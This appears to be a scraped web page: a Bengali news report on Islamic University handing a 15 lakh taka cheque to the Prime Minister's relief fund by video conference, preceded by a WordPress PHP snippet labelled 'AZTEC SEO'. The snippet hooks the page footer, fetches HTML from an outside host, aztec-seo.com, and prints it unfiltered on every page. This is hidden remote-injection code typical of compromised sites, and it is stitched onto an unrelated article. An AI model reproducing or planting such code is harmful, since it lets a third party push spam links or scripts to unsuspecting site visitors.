/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
ভিডিও কনফারেন্সের মাধ্যমে প্রধানমন্ত্রীর ত্রাণ ও কল্যান তহবিলে ১৫ লাখ টাকার চেক হস্তান্তর করেছে ইসলামী বিশ্ববিদ্যালয় (ইবি)। রবিবার (১০ মে) বেলা ১১ টায় প্রধানমন্ত্রীর তেজগাঁও কার্যালয় ও গণভবনে অনুষ্ঠিত ভিডিও কনফারেন্সের মাধ্যমে চেক গ্রহণ করেন প্রধানমন্ত্রীর মুখ্য সচিব ড. আহমদ কায়কাউস।
চেক হস্তান্তর অনুষ্ঠানে সংক্ষিপ্ত বক্তব্য প্রদান করেন ইবি উপাচার্য অধ্যাপক ড. হারুন উর রশিদ আসকারী। এ সময় তিনি উপ-উপাচার্য অধ্যাপক ড. শাহীনুর রহমান ও কোষাধ্যক্ষ অধ্যাপক ড. সেলিম তোহাকে পরিচয় করিয়ে দেন। তিনি বিশ্ববিদ্যালয়কে ৫৩৭ কোটি টাকার মেগা প্রকল্প অনুমোদনের জন্য ইবি পরিবারের পক্ষ হতে প্রধানমন্ত্রী শেখ হাসিনাকে কৃতজ্ঞতা ও ধন্যবাদ জ্ঞাপন করেন।
এছাড়া করোনা সংকটকালীন মুহুর্তে কুষ্টিয়ার পিসিআর ল্যাবে করোনা টেস্টে বায়োটেকনোলজি ও জেনেটিক ইঞ্জিনিয়ারিং বিভাগের কারিগরী সহায়তা প্রদান, ক্যাম্পাস ও আশেপাশের এলাকায় করোনা মোকাবেলায় সরঞ্জামাদি প্রদানসহ বিশ্ববিদ্যালয়ের গৃহীত বিভিন্ন কর্মকান্ডের কথা প্রধানমন্ত্রীকে অবহিত করেন। প্রধানমন্ত্রী উপাচার্যের বক্তব্য শুনে গৃহীত সব কর্মকাণ্ডে সন্তোষ প্রকাশ করেন।